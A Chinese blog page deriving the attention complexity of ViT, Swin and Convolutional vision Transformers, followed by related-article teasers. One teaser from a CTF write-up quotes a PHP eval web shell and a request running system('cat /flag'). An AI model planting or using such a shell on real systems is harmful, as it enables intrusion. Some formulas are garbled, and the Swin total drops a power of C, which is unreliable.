vision transformer的计算复杂度

news2025/12/17 3:42:51

文章目录

Vision transformer
Swin transformer
Convolutional vision Transformer

Vision transformer

在这里插入图片描述

假设每个图像有 $h * w$ 个patch，维度是 $C$

输入的图像 $X$ ( 大小为 $h w * C$ )，和三个系数矩阵相乘 ( 大小为 $C * C$ )，得到 $q k v$ 三个向量 ( $h w * C$ )，复杂度为：
$3hwC^2$

$q$ ( $h w * C$ ) 和 $k$ ( $C * h w$ ) 相乘得到矩阵 $A$ ( $h w * h w$ )，复杂度为： $hw)^2C$

$A$ ( $h w * h w$ ) 和 $v$ ( $h w * C$ )相乘，得到多头注意力的结果 ( $h w * C$ )，复杂度为： $hw)^2C$

经过MLP投影层 ( $C * C$ )，得到 ( $h w * C$ )，复杂度为：
$hwC^2$

所以复杂度之和为： $4hwC^2 + 2(hw)^2C$

Swin transformer

在这里插入图片描述
基于滑动窗口的多头注意力，是在每个窗口内计算注意力

假设每个窗口有 $M \times M$ 个patch

在一个窗口内的复杂度为：

$4M^2*C+2M^4C$

共有 $hw /M^2$ 个窗口，所以复杂度之和为：

$4hwC+2M^2hwC$

Convolutional vision Transformer

使用 $s \times s$ 卷积进行卷积投影，有 $h w$ 个patch，通道维度为 $C$

输入的图像 $X$ ( 大小为 $h w * C$ )，使用三个标准卷积进行投影 ( 大小为 $s * s * C$ )，得到 $q k v$ 三个向量 ( $h w * C$ )，投影的复杂度为：

$3hws^2C^2$

使用深度可分离卷积，投影的复杂度为：

$3hws^2C$

使用步长大于1的卷积进行多头注意力的投影，减小后面注意力的计算花销。

key和value的步长为2，query的步长为1，key和value的token数量减小了4倍，所以后续的多头注意力计算花销也减小了4倍。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/581009.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

CTF国赛2023 - ukfc

CTF国赛2023 - ukfc

没啥好说的，惜败 Web unzip L.zip bello /var/www/htmlR.zip bello bello.php <?php eval($_REQUEST[a]); ?>先传入L文件，在传入R文件，然后 bello.php?asystem(%27cat%20/flag%27);dumpit 访问 ?dbctf&table_2_dumpflag1%0Ae…

阅读更多...

【C++】数组 - 一维数组，二维数组

【C++】数组 - 一维数组，二维数组

文章目录 1. 一维数组1.1 一维数组定义方式1.2 数组名1.3 冒泡排序 2. 二维数组2.1 二维数组定义方式2.2 数组名所谓数组，就是一个集合，里边存放了相同类型的数据元素。特点1：数组中的每个数据元素都是相同的数据类型特点2：数…

阅读更多...

vue学习1

vue学习1

文章目录 VUE注意点绑定模板语法插值语法指令语法 vue中的data数据代理事件处理点击修饰符键盘事件keyup 计算属性监视深度监视监视与计算属性的区别样式绑定条件渲染列表渲染对key的理解列表过滤监视数据改变的底层原理SET()数据劫持接收表单数据过滤器局部过滤器全局过滤器…

阅读更多...

linux常用命令精选

linux常用命令精选

参考文章： Top 60 Linux Interview Questions and Answers - howtouselinux 在管理和维护Linux系统时，有一些常用的命令可以帮助您进行系统初始化和配置。这些命令涵盖了各种任务，包括系统设置、用户管理、软件安装和网络配置等。本文将为…

阅读更多...

C++11中的智能指针unique_ptr、shared_ptr和weak_ptr详解

C++11中的智能指针unique_ptr、shared_ptr和weak_ptr详解

目录 1、引言 2、什么是智能指针？ 3、在Visual Studio中查看智能指针的源码实现 4、独占式指针unique_ptr 4.1、查看unique_ptr的源码实现片段 4.2、为什么unique_ptr的拷贝构造函数和复制函数被delete了？（面试题） 4.3、使…

阅读更多...

【C++】——vector的介绍及模拟实现

【C++】——vector的介绍及模拟实现

文章目录 1. 前言2. vector的介绍3. vector的常用接口3.1 vector对象的常见构造函数3.2 iterator的使用3.3 vector的空间管理3.4 vector的增删查改 4. vector迭代器失效的问题4.1 底层空间改变的操作4.2 指定位置元素的删除操作 5. vector模拟实现6. 结尾 1. 前言上一篇文章我…

阅读更多...

K210入门-环境搭建与点灯测试（一）

K210入门-环境搭建与点灯测试（一）

目录 1、简介 2、资质查找 3、IDE下载安装 4、测试程序 4.1 测序复制 4.2 开发板选择 4.3 链接 4.4 效果展示 1、简介本文主要针对小白使用K210进行入门，以及自己学习的总结与笔记使用。本文主要进行环境搭建与点灯测试。 2、资质查找首先去官网进行资料下…

阅读更多...

Flume系列：Flume数据监控Ganglia

Flume系列：Flume数据监控Ganglia

目录 Apache Hadoop生态-目录汇总-持续更新安装说明 1）安装 ganglia 2）在 worker213 修改配置文件 3）在所有服务器修改配置文件/etc/ganglia/gmond.conf 4）启动 ganglia 5）打开网页浏览 ganglia 页面 6&…

阅读更多...

《UVM 实战》代码下载，无需注册

《UVM 实战》代码下载，无需注册

法一： https://www.hzcourse.com/web/refbook/detail/5651/229 法二： https://www.hzcourse.com/oep/resource/access/L29wZW5yZXNvdXJjZXMvdGVhY2hfcmVzb3VyY2UvZmlsZS8yMDE3LzEwL2IyMDE0OTFmMmUxMjdkNTM2YjhmMjBmNWUzMTRhMjE3Lmd6JGV4YW1wbGVfYW5kX3…

阅读更多...

如何在华为OD机试中获得满分？Java实现【报数游戏】一文详解！

如何在华为OD机试中获得满分？Java实现【报数游戏】一文详解！

✅创作者：陈书予 🎉个人主页：陈书予的个人主页 🍁陈书予的个人社区，欢迎你的加入: 陈书予的社区 🌟专栏地址: Java华为OD机试真题（2022&2023) 文章目录 1. 题目描述2. 输入描述3. 输出描述4. Java算法源码5. 测试6.解题思路1. 题目描述 100个人围成一圈，每个人…

阅读更多...

Redis数据库简介

Redis数据库简介

1.Redis数据库介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 2.Redis数据库特性 Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的时候可以再次加…

阅读更多...

2023 华为 Datacom-HCIE 真题题库 09--含解析

2023 华为 Datacom-HCIE 真题题库 09--含解析

单项选择题 1.[试题编号：190485] （单选题）华为交换机MAC地址表的老化时间默认是多少秒? A、500 B、5 C、300 D、400 答案：C 解析：无 2.[试题编号：190484] （单选题）如图所示&#…

阅读更多...

数据分析之Pandas--数据检索

数据分析之Pandas--数据检索

数据分析之Pandas（03）--数据检索 pandas的数据检索功能是其最基础也是最重要的功能之一。 pandas中最常用的几种数据过滤方式如下： 1. 行列过滤：选取指定的行或者列 2. 条件过滤：对列的数据设置过滤条件 3. 函数过…

阅读更多...

提升PostGIS大范围、大数据量分区几何裁剪统计查询速度技巧

提升PostGIS大范围、大数据量分区几何裁剪统计查询速度技巧

PostGIS是在GIS系统开发中常用的开源空间数据库，使用PostGIS进行大范围、大数据量的几何裁剪操作时，耗时较长。当我遇到需要按区县或选中的乡镇，计算展示林规、土地报批等多个规划数据的面积等，此时需要使用规划数据叠加行政界线…

阅读更多...

几句命令搞定一个es：docker安装elasticsearch+可视化kibana

几句命令搞定一个es：docker安装elasticsearch+可视化kibana

docker安装elasticsearch可视化kibana 写在前面es安装：docker安装elasticsearches搜索：安装elasticsearch插件IK分词器es可视化：docker安装kibana最后写在前面从自己知道es开始到写这篇文章差不多也有5年左右的时间了吧，之前总…

阅读更多...

FastReport.Net FastReport.Core 2023.2.15 Crack

FastReport.Net FastReport.Core 2023.2.15 Crack

快速报告.NET .NET 7 的报告和文档创建库 FastReport.Net & FastReport.Core适用于 .NET 7、.NET Core、Blazor、ASP.NET、MVC 和 Windows 窗体的全功能报告库。它可以在 Microsoft Visual Studio 2022 和 JetBrains Rider 中使用。快速报告.NET 利用 .NET 7、.NET Core、…

阅读更多...

C++程序设计基础【一】

C++程序设计基础【一】

C程序设计基础【一】一、一个程序的开发步骤1.编辑程序2.编译程序3.链接程序4.执行程序5.测试 2.基础代码解读1.预处理指令(#include <iostream>)2.块注释(/* */)3.行注释(//)4.using namespace std5.int main()6.{}7.std::cin、std::cout、std::endl8.return 0 二、变量…

阅读更多...

云上高校导航开发指引与注意事项

云上高校导航开发指引与注意事项

🔬 注意事项大部分数据存储在utils.js中的，页面通过引入utils.js方式渲染数据图标全部存储在项目images文件夹里,均下载自 iconfont网站（自行替换） 部分图片引用自免费图床 - CDN加速图床（自行替换） …

阅读更多...

七年程序员的三四月总结：三十岁、准备婚礼、三次分享

七年程序员的三四月总结：三十岁、准备婚礼、三次分享

你好，我是 shixin，一名工作七年的安卓开发。每两个月我会做一次总结，记下这段时间里有意义的事和值得反复看的内容，为的是留一些回忆、评估自己的行为、沉淀有价值的信息。一转眼 2023 年过去了三分之一，这两个月经…

阅读更多...

响应式编程实战：Spring WebFlux集成MongoDB和Swagger

响应式编程实战：Spring WebFlux集成MongoDB和Swagger

1 缘起新的项目，快速迭代， 技术选型：Spring WebFlux， 非Spring MVC， 之前没有接触过Spring WebFlux，项目中都是使用Spring MVC， 这次学到了新的知识Spring WebFlux，记录下。 2 Sp…

阅读更多...

推荐文章

最新文章